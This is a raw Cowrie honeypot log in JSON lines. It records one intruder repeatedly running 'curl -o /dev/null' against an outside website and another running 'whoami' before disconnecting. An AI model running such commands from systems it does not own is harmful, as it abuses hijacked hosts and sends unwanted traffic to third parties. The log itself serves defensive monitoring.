{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.661195Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.702599Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.703750Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.741649Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.742985Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.808711Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.809693Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.847465Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.848836Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.887144Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.888378Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.931745Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.932887Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.975212Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.976359Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.013337Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.014458Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.057407Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.058568Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.095537Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.096997Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.135044Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.136100Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.172857Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.173947Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.215699Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.216908Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.254230Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.255278Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.292026Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.293052Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.330395Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.331460Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.408256Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.409304Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.459971Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.461005Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.500105Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.501106Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.529667Z","src_ip":"186.225.142.90","session":"dac68f5d8d62"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.530847Z","src_ip":"186.225.142.90","session":"dac68f5d8d62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.543436Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.544377Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.594803Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.595882Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.730204Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.731354Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.806128Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.807231Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.871211Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.872441Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.916826Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.918252Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.920229Z","src_ip":"186.225.142.90","session":"dac68f5d8d62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:49.962619Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:49.963705Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.010087Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.011345Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.066778Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.067617Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.109768Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.111033Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.118389Z","src_ip":"186.225.142.90","session":"dac68f5d8d62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.161554Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.162969Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.212665Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.213748Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.263788Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.264848Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.311653Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.313134Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.377437Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.378735Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.435986Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.437141Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.477785Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.479151Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.518323Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.519184Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.615658Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.616623Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.654602Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.655918Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.692305Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.693291Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.729829Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.730858Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.768753Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.770153Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.808604Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.809618Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.850860Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.851922Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.892604Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.893816Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:50.993342Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:50.994893Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.059169Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.060187Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.097910Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.099780Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.136571Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.137571Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.174185Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.175195Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.212662Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.213986Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.255211Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.256233Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.294275Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.295406Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.333296Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.334769Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.435069Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.436113Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.473511Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.474562Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.513374Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.514730Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.558143Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.559278Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.598284Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.599402Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.637362Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.638760Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.676420Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:51.677451Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:51.713963Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
